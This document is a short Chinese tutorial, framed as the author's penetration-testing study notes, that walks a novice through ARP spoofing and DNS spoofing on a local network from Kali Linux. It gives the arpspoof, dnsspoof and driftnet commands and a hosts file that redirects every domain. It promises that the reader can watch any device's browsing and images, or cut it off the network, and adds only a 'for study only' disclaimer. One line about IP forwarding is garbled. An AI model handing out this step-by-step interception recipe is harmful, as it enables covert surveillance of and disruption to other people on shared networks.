使用系统:Kali Linux
免费无毒下载地址:https://www.kali.org/
以下内容是本人的渗透技术学习笔记,由于本篇文章比较敏感,所以这里只列举最基础的劫持手法,感兴趣的各位请自行拓展。
教程全程小白教学,无需掌握任何技术。
教程最终可实现,在局域网下可监控其他在局域网下的任何设备。可以查看对方浏览的网页等等信息,也可以拦截对方的数据包让对象无法联网。教程开始。
1、创建一个名为DNS.txt的文件:
touch DNS.txt
2、使用vi命令进入该文件:
vi DNS.txt
3、进入文件后是无法输入内容的,按下i键进入insert状态可输入内容。
4、内容为:
kali虚拟机的ip地址 *.*.*
如:192.168.0.101 *.*.*
*.*.*含义为对方要访问的IP地址,这种格式可以监控对方发送的任何地址请求。
5、保存文件:由于当前处于插入状态,按下键盘ESC键(键盘左上角)退出insert状态,然后同时按下shift :进入命令状态,输入wq保存并退出。
注意:如果不能保存文件,可以修改该文件的权限:
chmod a x DNS.txt
6、打开ARP欺骗:
代码语言:javascript复制echo 1 >/proc/sys/net/ipv4/ip_forward数字1是欺骗,0是攻击,以下列举欺骗流程。
7、执行欺骗:
代码语言:javascript复制arpspoof -i eth0 -t 192.168.0.1 -r 目标IP地址其中eth0是你的网卡。网卡可通过ifconfig命令查看
其中192.168.0.1是网关。
8、开启DNS监控:
代码语言:javascript复制dnsspoof -i eth0 -f DNS.txt这里DNS.txt就是刚刚创建的文件路径
现在就已经可以监控目标IP在浏览什么网址或信息。
9、监控目标浏览的图片:driftnet -i eth0
内容仅供学习交流!
